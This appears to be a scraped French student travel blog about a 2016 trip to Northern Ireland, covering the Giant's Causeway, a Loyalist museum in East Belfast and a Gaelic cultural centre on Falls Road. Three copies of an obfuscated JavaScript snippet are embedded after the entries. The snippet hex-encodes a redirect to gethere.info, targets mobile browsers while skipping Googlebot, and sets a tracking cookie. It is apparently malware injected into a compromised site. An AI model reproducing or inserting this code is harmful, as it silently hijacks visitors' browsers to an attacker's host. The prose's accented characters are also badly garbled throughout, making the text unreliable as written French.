RenomA�e

La ChaussA�e des GA�ants fait parti du patrimoine mondial de l’UNESCO et est entretenue par le National Trust, qui s’occupe de la conservation et de la valorisation de sites et da��autres monuments se trouvant notamment en Irlande du Nord. Ce prestigieux site, de part son attrait gA�ologique, est A�galement classA� sous d’autres appellations, comme par exemple sous l’ « Areas of Special Scientific Interest (ASSIs) » ou encore comme rA�serve naturelle.

ExpA�rience personnelle

AprA?s avoir visitA� le centre touristique, nous avons rA�cupA�rA� des audio-guides afin de pouvoir avoir des informations tout au long de notre visite.
Nous avons longA� la cA?te du « Portnaboe » jusqu’au « Port Noffer » A� travers un vent tempA�tueux. Le docteure Jennifer McKinley du dA�partement de GA�ologie A� l’UniversitA� de Queen’s nous accompagnait. En chemin nous nous sommes arrA?tA�s A� diffA�rents endroits, oA? elle nous donnait des informations sur la gA�ologie des lieux.
ArrivA�s A� la ChaussA�e des GA�ants, aprA?s avoir eu de la grA?le et de la pluie, nous avons pu profitA� du lieu, prendre des photos, le tout sous le soleil irlandais. Malheureusement, la chaussA�e principale A�tait fermA�e due aux conditions mA�tA�orologiques changeantes.

index

Notre groupe en haut des colonnes de basalte, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants

Bibliographie

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au Loyalist Museum a�� Andy Tyrie Interpretive Centre

Par Emilie Guibert et Valentina Ferreira GutiA�rrez

AprA?s avoir passA� une partie de notre sA�jour A� dA�couvrir plusieurs facettes de Belfast, nous avons eu la��opportunitA� da��en explorer une nouvelle, notamment le quartier protestant de East Belfast. Robert, notre chauffeur de bus nous a dA�posA�s devant le A�Loyalist Museum, un musA�e administrA� bA�nA�volement par plusieurs personnes ayant vA�cu la pA�riode des Troubles. Deux da��entre elles nous ont proposA� une visite en deux parties, la premiA?re comprenant un walking tour dans le quartier de East Belfast, et la seconde une visite guidA�e du musA�e. Le soleil na��A�tant pas de la partie, nous avons A�tA� chaleureusement accueilli avec du thA� et du cafA� pour nous rA�chauffer.

Nous avons donc commencA� par une visite guidA�e du quartier da��environ une heure. Un des guides nous a conduits vers les principaux mA�moriaux et murals du quartier en nous explicitant la��aspect symbolique que ces derniers revA?tent pour la communautA� protestante. ParallA?lement, ce dernier nous expliquait le rA?le que les individus reprA�sentA�s sur les fresques ont jouA� lors du conflit, ainsi que le statut des victimes auxquels les mA�moriaux sont dA�diA�s. A�Parfois, il faut avouer que nous avons A�tA� choquA�s par la violence de certaines peintures et slogans. En effet, nous avions la��impression que ces derniers avaient pour but de promouvoir les diffA�rents groupes paramilitaires (notamment la��UYM, UDA, UFF*), ce qui nous a semblA� paradoxal A�tant donnA� le processus de paix initiA� en 1998. A�a�?For as long as one hundred of us remain alive, we shall never in anyway consent to submit to the Irish for ita��s (a��) UDA/UFFa�?. Ces propos figurant sur une des fresques les plus cA�lA?bres du quartier illustre bien la��atmosphA?re de violence encore patente en ce lieu.

Tout au long de la visite, nous avons remarquA� que notre guide utilisait souvent le pronom personnel a�?nousa�? lorsqua��il nous racontait la��histoire du quartier, ce qui peut nous laisser penser que ce dernier a A�tA� impliquA� de maniA?re partisane dans le conflit. Sans vraiment nous transmettre son expA�rience personnelle et son vA�cu, nous pouvions sentir dans ses dires un manque de neutralitA� et da��objectivitA�. Toutefois, ayant entrevu ce que le musA�e contenait, nous pouvions nous attendre A� ce genre de discours plus ou moins partial. MalgrA� cela, nous avons trouvA� cette visite trA?s intA�ressante et complA�mentaire A� ce que nous avons appris auparavant A� propos de Belfast. En effet, nous avions dA�jA� visitA� le quartier protestant de Shankill, mais uniquement A� travers les yeux da��un guide catholique. Ici, le fait da��A?tre accompagnA� par une personne sa��identifiant A� la cause rA�publicaine nous a permis da��accA�der A� un autre point de vue du conflit.

AprA?s une heure de marche dans le froid de Belfast, nous sommes passA�s A� la deuxiA?me partie du programme, A� savoir la visite du musA�e. Les objets y figurant A�taient tous liA�s A� la pA�riode des Troubles. La��abondance da��armes, da��articles relatant les crimes perpA�trA�s par la��IRA** et les mannequins revA?tant les uniformes militaires de la��UFF et de la��UDA nous ont plongA�s de maniA?re indirecte dans la��atmosphA?re violente du conflit.

Tout au long de notre visite, nous avons parfois eu la��impression da��assister A� une sorte de a�?performance identitairea�? de la part de nos deux guides, comme si ces derniers tentaient de promouvoir la cause loyaliste auprA?s des visiteurs. MalgrA� cela, connaA�tre les deux versions du conflit nous a permis da��avoir une vision plus globale des Troubles. GrA?ce A� toutes les informations que nous avons assimilA�es A� travers nos diverses expA�riences, nous pouvons maintenant adopter une pensA�e plus critique et objective du conflit ayant sA�vit A� Belfast. Au cours de notre voyage, divers points de vue nous ont A�tA� transmis. La��hA�tA�rogA�nA�itA� de ces derniers nous a conduit A� considA�rer la pA�riode des Troubles avec un certain recul. Or, cette distanciation sa��avA?re nA�cessaire dans le cadre da��une analyse neutre et acadA�mique.

*UYM: Ulster Youg Militance / UFF: Real Ulster Freedom Fighters / UDA: Ulster Defense Association

** IRA: Real Irish Republican Army

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au centre gaA�lique CultA?rlann McAdam A� Fiaich

Par Laetitia Valentin et Christina Zholdokova

Mardi 1er mars 2016, aux alentours de midi, nous venions tout juste de terminer la visite en Black Cab et nous avons A�tA� dA�posA�s par ceux-ci devant le centre gaA�lique CultA?rlann McAdam A� Fiaich sur Falls Road.

Ce centre culturel est installA� dans une ancienne A�glise presbytA�rienne A� laquelle une nouvelle aile a A�tA� rattachA�e pour A�tablir une galerie da��art. Nous avons da��abord eu le plaisir de manger au cafA� du centre se trouvant dans le hall da��entA�e au rez-de-chaussA�e. Nous avons A�tA� surpris de recevoir un menu bilingue gaA�lique da��un cA?tA�, anglais de la��autre. En fait, le centre cherche A� faire perdurer la culture irlandaise principalement par le biais de la langue gaA�lique. Pour ce faire, il organise des sA�ances de thA�A?tre, offre la possibilitA� de prendre des cours, soit da��initiation, soit de perfectionnement de la langue gaA�lique, vend des livres autours de la culture irlandaise tant en gaA�lique qua��en anglais. Il propose A�galement des bijoux et da��autres petits articles en lien avec la culture irlandaise et organise des expositions de tableaux ayant pour thA?me les paysages da��Irlande.

Nous avons eu droit A� une confA�rence de la part da��un membre du CultA?lann McAdam A� Fiaich nous expliquant les butes de ce centre. Ils affirment A?tre ouvert A� tous, da��ailleurs, ils invitent A�galement les protestants A� venir voir les spectacles. Leurs objectifs sont donc purement culturels. Cela dit, nous avons tout de mA?me appris durant cette confA�rence qua��un clivage langagier et culturel persiste entre catholiques et protestants. En effet, les enfants catholiques apprennent le gaA�lique A� la��A�cole alors que les enfants protestants na��apprennent que la��anglais et en raison de ce clivage, il est da��autant plus difficile da��attirer des Unionistes dans un centre qui prA?ne les valeurs irlandaises. MalgrA� cette sA�paration persistante entre les deux cultures, un pas de plus vers la paix et la��ouverture A� la culture irlandaise est effectuA� par le centre.

Nous avons A�galement reA�u un petit dA�pliant traduisant de la��anglais au gaA�lique les expressions de tous les jours les plus courantes (A� voir ci-dessous)

Fun facts:

– AprA?s les rA�novations apportA�es en 2011 A� l’ancienne A�glise presbytA�rienne abritant le centre de culture CultA?rlann McAdam A� Fiaich, une galerie d’art sous le nom de Gerard Dillon est ouverte.

– Seule Marie Louise Gormley, artiste crA�ant des images en feutre, assemblA�es A� la machine A� coudre A� partir de soies teintes A� la main et de fils A� broder, est reprA�sentA�e A� la galerie d’art pour le moment.

– La galerie n’est pas seulement un lieu d’exposition, mais A�galement d’achat, A�tant donnA� que des prix figurent sur une partie des A�uvres, permettant un soutien aux artistes locaux.

– Un espace comportant des panneaux tactiles interactifs est prA�sent dans cette nouvelle aile du centre et permet d’acquA�rir des connaissances sur la toponymie des lieux, la poA�sie, la littA�rature, le langage, l’histoire, ainsi que d’autres aspects de la culture irlandaise.

– La collection de livres en vente dans la boutique du rez-de-chaussA�e a longtemps voyagA� de librairie en librairie, avant de finalement A?tre A�tablie de maniA?re permanente au centre CultA?rlann McAdam A� Fiaich. Cette librairie est dite la plus complA?te et diversifiA�e d’Irlande du Nord, regroupant des ouvrages traitant uniquement de la culture et de la vie irlandaises.

– De petits concerts de musique irlandaise jouA�e par des artistes locaux sont organisA�s au sein du restaurant situA� en face de la boutique, au rez-de-chaussA�e.

– Les activitA�s proposA�es par le centre CultA?rlann McAdam A� Fiaich comportent mA?me des cours de bodhran, un instrument de percussion utilisA� dans la musique irlandaise, dA�couvert lors de ce qu’on appelle la « RA�volution Celtique » des annA�es 1960, ne servant auparavant que d’objet rituel lors de rites religieux.

DA�pliant traduction anglais – gaA�lique

 

Bibliographie

Article:
CultA?rlann McAdam A� Fiach (2004-2016)[En ligne] URL: http://www.culturlann.ie/en/, consultA� le 29 mars 2016.

Fun facts:
1) CultA?rlann McAdam A� Fiach (2004-2016) [En ligne] URL: http://www.culturlann.ie/en/
ConsultA� le 15 avril 2016.
2) Visit Belfast: The Official Visitor Website [En ligne] URL:
http://visitbelfast.com/things-to-do/member/culturlann-mcadam-o-fiaich
ConsultA� le 15 avril 2016.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}